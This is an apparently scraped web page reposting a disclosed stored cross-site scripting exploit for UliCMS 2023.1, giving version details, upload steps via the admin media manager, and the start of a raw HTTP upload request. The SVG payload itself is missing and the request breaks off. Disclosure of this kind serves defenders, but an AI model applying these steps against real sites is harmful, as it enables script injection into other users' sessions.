1. Home
  2. Live Updates
  3. UliCMS 2023-1 Sniffing-Vicuna Cross Site Scripting : vimarsa

UliCMS 2023-1 Sniffing-Vicuna Cross Site Scripting : vimarsa

UliCMS 2023-1 Sniffing-Vicuna Cross Site Scripting

#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)#Application: Ulicms#Version: 2023.1-sniffing-vicuna#Bugs: Stored Xss#Technology: PHP#Vendor URL: https://en.ulicms.de/#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip#Date of found: 04-05-2023#Author: Mirabbas Ağalarov#Tested on: Linux 2. Technical Details & POC========================================steps: 1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)2. upload malicious svg filesvg file content ===>poc request:POST /dist/admin/fm/upload.php HTTP/1.1Host: localhostContent-Length: 663sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"Accept: application/json, text/javascript, */*;

Related Keywords

, Software Link , Exploit Title , Stored Cross Site Scripting ,

© 2025 Vimarsana